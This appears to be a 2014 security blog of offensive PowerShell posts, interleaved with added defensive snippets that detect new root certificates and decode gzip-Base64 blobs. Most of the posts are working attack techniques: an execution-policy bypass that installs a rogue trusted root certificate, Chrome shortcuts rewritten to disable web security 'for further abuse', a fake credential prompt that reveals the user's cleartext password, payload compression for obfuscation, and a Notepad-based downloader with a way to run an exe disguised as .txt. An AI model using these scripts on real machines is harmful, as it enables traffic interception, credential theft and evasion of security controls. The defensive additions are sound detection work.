Tuesday, December 23, 2014

PowerShell certificate signing

Mission:
Executable file that adds our certificate to "Trusted Root Certification Authorities".

Prerequisite:
- generate certificate (http://www.selfsignedcertificate.com)

Flow:
- bypass PowerShell execution policy
- write certificate to disk
- load certificate file to relevant store
- delete certificate file
- open certmgr
- compile ps file to exe using ps2exe (https://ps2exe.codeplex.com)

$certificate = @'
-----BEGIN CERTIFICATE-----
YOUR_CERTIFICATE_HERE
-----END CERTIFICATE-----
'@

#http://www.nivot.org/blog/post/2012/02/10/Bypassing-Restricted-Execution-Policy-in-Code-or-in-Script
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}

Disable-ExecutionPolicy

# Set the certificate file path
$certPath = ".deadbeef.cert"

# Write certificate to disk
$certificate | out-file $certPath

# Get the certificate store for "Trusted Root Certification Authorities" (Cert:\LocalMachine\Root)
$certStore = New-Object -TypeName System.Security.Cryptography.X509Certificates.X509Store Root, LocalMachine

# Get the certificate from the location where it was placed by the export process
$cert = New-Object -TypeName System.Security.Cryptography.X509Certificates.X509Certificate2 $certPath

# delete certificate file from disk
Remove-Item $certPath

# Open the store with maximum allowed privileges
$certStore.Open("MaxAllowed")

# Add the certificate to the store
$certStore.Add($cert)

# Close the store
$certStore.Close()

# open certificate manager
Invoke-Item cert:\
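
From the defender's side, a certificate added this way shows up as a new entry in Cert:\LocalMachine\Root. The following is an added example, not code from the original post: it compares the store against a saved baseline; the function names and the baseline file root-baseline.txt are hypothetical.

```powershell
# Added example: report LocalMachine\Root certificates missing from a baseline.
# Registry location of the store's own entries (as opposed to AuthRoot or
# Group Policy); certificates added through X509Store.Add() are written here.
$RootRegPath = 'HKLM:\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates'

function Save-RootStoreBaseline {
    param([Parameter(Mandatory)][string]$Path)   # hypothetical baseline file
    Get-ChildItem -Path Cert:\LocalMachine\Root |
        ForEach-Object { $_.Thumbprint.ToUpperInvariant() } |
        Sort-Object -Unique |
        Set-Content -Path $Path -Encoding ASCII
}

function Find-NewRootCertificate {
    param([Parameter(Mandatory)][string]$BaselinePath)
    # Load known thumbprints, one per line, ignoring blank lines
    $known = New-Object 'System.Collections.Generic.HashSet[string]'
    foreach ($line in Get-Content -Path $BaselinePath) {
        $t = $line.Trim().ToUpperInvariant()
        if ($t) { [void]$known.Add($t) }
    }
    foreach ($cert in Get-ChildItem -Path Cert:\LocalMachine\Root) {
        $thumb = $cert.Thumbprint.ToUpperInvariant()
        if ($known.Contains($thumb)) { continue }
        [pscustomobject]@{
            Thumbprint      = $thumb
            Subject         = $cert.Subject
            Issuer          = $cert.Issuer
            NotBefore       = $cert.NotBefore
            NotAfter        = $cert.NotAfter
            # True when the entry was written to the local registry store
            InLocalRegistry = Test-Path -Path (Join-Path $RootRegPath $thumb)
        }
    }
}

# Run once on a known-good machine, then re-check later:
# Save-RootStoreBaseline -Path .\root-baseline.txt
# Find-NewRootCertificate -BaselinePath .\root-baseline.txt | Format-Table -AutoSize
```

Any row it returns is a root the machine did not trust when the baseline was taken and should be explained or removed.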

Tuesday, December 2, 2014

PowerShell compression \ decompression

I needed a minimal footprint for one of my previous PowerShell unmanaged declarations.

Compression:
$s = @'
YourInputHere
'@
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($s)
$sw.Close();
$s = [System.Convert]::ToBase64String($ms.ToArray())

Decompression:
$data = [System.Convert]::FromBase64String("CompressedBase64StreamHere")
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
# Read the decompressed text back into a string
$s = $sr.ReadToEnd()

I managed to get a 50% decrease on a small input stream... nice!
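
For anyone reviewing scripts that carry such blobs: the gzip header bytes 1F 8B 08 always encode to "H4sI" in Base64, so the compressed strings are easy to locate and expand for inspection. The following is an added example, not code from the original post; the function name Expand-GzipBase64InText and the sample text are constructed for illustration.

```powershell
# Added example: find Base64-encoded gzip blobs in script text and expand them.
function Expand-GzipBase64InText {
    param([Parameter(Mandatory)][string]$Text)
    # gzip header 1F 8B 08 encodes to "H4sI" in Base64
    $pattern = 'H4sI[A-Za-z0-9+/]{16,}={0,2}'
    foreach ($m in [regex]::Matches($Text, $pattern)) {
        try {
            $bytes = [System.Convert]::FromBase64String($m.Value)
            $ms = New-Object System.IO.MemoryStream(,$bytes)
            $gz = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
            $sr = New-Object System.IO.StreamReader($gz)
            [pscustomobject]@{
                Offset  = $m.Index
                Length  = $m.Length
                Decoded = $sr.ReadToEnd()
            }
            $sr.Close()
        }
        catch {
            # Not valid Base64 or not a complete gzip stream: report it undecoded
            [pscustomobject]@{ Offset = $m.Index; Length = $m.Length; Decoded = $null }
        }
    }
}

# Constructed sample: compress a harmless string the same way the post does,
# embed it in a line of script text, then recover it.
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write('Write-Output "hello from a compressed blob"')
$sw.Close()
$blob = [System.Convert]::ToBase64String($ms.ToArray())
$sample = '$data = [System.Convert]::FromBase64String("' + $blob + '")'

Expand-GzipBase64InText -Text $sample | Format-List
```

The decoded text is only returned as a string and is never executed, so the function is safe to run over untrusted script content.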

PowerShell shortcuts manipulation

Here is a simple implementation of how to manipulate Chrome desktop shortcuts to contain
"--disable-web-security --disable-popup-blocking" for further abuse.

$desktop = [System.Environment]::GetFolderPath('Desktop')
$wshShell = new-object -comobject WScript.Shell
$shortcuts = get-childitem -path $desktop -recurse -force -include "chrome*.lnk"  -ErrorAction silentlycontinue
foreach ($shortcut in $shortcuts)
{
    $s = $wshShell.CreateShortcut($shortcut.FullName)
    $s.Arguments = "--disable-web-security --disable-popup-blocking"
    $s.Save()
}

PowerShell toolbox

In the last two years I had to deal with PowerShell several times; here are some of the finest resources I managed to find.

Sometimes the target computer does not allow running PowerShell scripts; here is the solution:
15 Ways to Bypass the PowerShell Execution Policy

Get user password via PowerShell credential window

I needed a simple way of getting someone's Windows credentials. I won't publish the full flow, but the main core is the 4-line PowerShell script that initiates a Windows credential dialog containing both the domain and user name. After the user types the password and presses "OK", we use the built-in PowerShell "ConvertFrom-SecureString" to uncover his password.

$user = whoami
$ClearPassword = Get-Credential -Credential $user
$ClearPassword.Password | ConvertFrom-SecureString
$ClearPassword.GetNetworkCredential().password

Win32IProgressDialog via PowerShell

I had to mock a progress dialog via PowerShell. In order for the user to get the same look and feel according to their Windows version and theme, I wanted to use the embedded Win32IProgressDialog.
The attached code contains a minimal implementation in PowerShell.

The output is a Win32IProgressDialog that inherits the user theme, with animation in both the dialog and the system tray.



minimal unmanaged type declaration:
Add-Type @'
using System;
using System.Runtime.InteropServices;
using System.Text;
public class ProgressDialogg{
Win32IProgressDialog pd = null;
public void ShowDialog(string t, string c, string l1, string l2, string l3){
pd = (Win32IProgressDialog)new Win32ProgressDialog();
pd.SetTitle(t);
pd.SetCancelMsg(c, null);
pd.SetLine(1, l1, false, IntPtr.Zero);
pd.SetLine(2, l2, false, IntPtr.Zero);
pd.SetLine(3, l3, false, IntPtr.Zero);
pd.StartProgressDialog(IntPtr.Zero, null, PROGDLG.Modal, IntPtr.Zero);
}
public void SetValue(int val)
{
pd.SetProgress((uint)val, 100);
}
public static class shlwapi{
[DllImport("shlwapi.dll", CharSet = CharSet.Auto)]
static extern bool PathCompactPath(IntPtr hDC, [In, Out] StringBuilder pszPath, int dx);}
[ComImport]
[Guid("EBBC7C04-315E-11d2-B62F-006097DF5BD4")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
public interface Win32IProgressDialog{
void StartProgressDialog(IntPtr hwndParent, [MarshalAs(UnmanagedType.IUnknown)]    object punkEnableModless, PROGDLG dwFlags, IntPtr pvResevered );
void StopProgressDialog();
void SetTitle([MarshalAs(UnmanagedType.LPWStr)] string pwzTitle );
void SetAnimation(IntPtr hInstAnimation, ushort idAnimation );
[PreserveSig]
[return: MarshalAs(UnmanagedType.Bool)]
bool HasUserCancelled();
void SetProgress(uint dwCompleted, uint dwTotal );
void SetProgress64(ulong ullCompleted, ulong ullTotal );
void SetLine(uint dwLineNum, [MarshalAs(UnmanagedType.LPWStr)] string pwzString, [MarshalAs(UnmanagedType.VariantBool)] bool fCompactPath, IntPtr pvResevered );
void SetCancelMsg([MarshalAs(UnmanagedType.LPWStr)] string pwzCancelMsg, object pvResevered );
void Timer( PDTIMER dwTimerAction, object pvResevered );}
[ComImport]
[Guid("F8383852-FCD3-11d1-A6B9-006097DF5BD4")]
public class Win32ProgressDialog{}  
public enum PDTIMER : uint {Reset = (0x01), Pause = (0x02), Resume = (0x03)}
[Flags]
public enum PROGDLG : uint
{Normal = 0x00000000, Modal = 0x00000001, AutoTime = 0x00000002, NoTime = 0x00000004, NoMinimize = 0x00000008, NoProgressBar = 0x00000010}
}
'@


Usage:
$pd = New-Object ProgressDialogg
$pd.ShowDialog("title","cancel","line1","line2","line3")
$pd.SetValue(50)

P.S
The final version with type compression
$data = [System.Convert]::FromBase64String("CompressedBase64StreamHere")
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
Add-Type $sr.readtoend()
$pd = New-Object ProgressDialogg
$pd.ShowDialog("title","cancel","line1","line2","line3")

$pd.SetValue(50)

Monday, December 1, 2014

Notepad downloader

Apparently Windows notepad.exe supports UNC in the open dialog.

Just launch Notepad, open a new file and paste a URL, and it will download it for you :)

notepad open dialog

notepad request in fiddler
Save the file and you are ready to go.
P.S
If you wish to run an exe file with a txt extension, you can use the call command.

call test.txt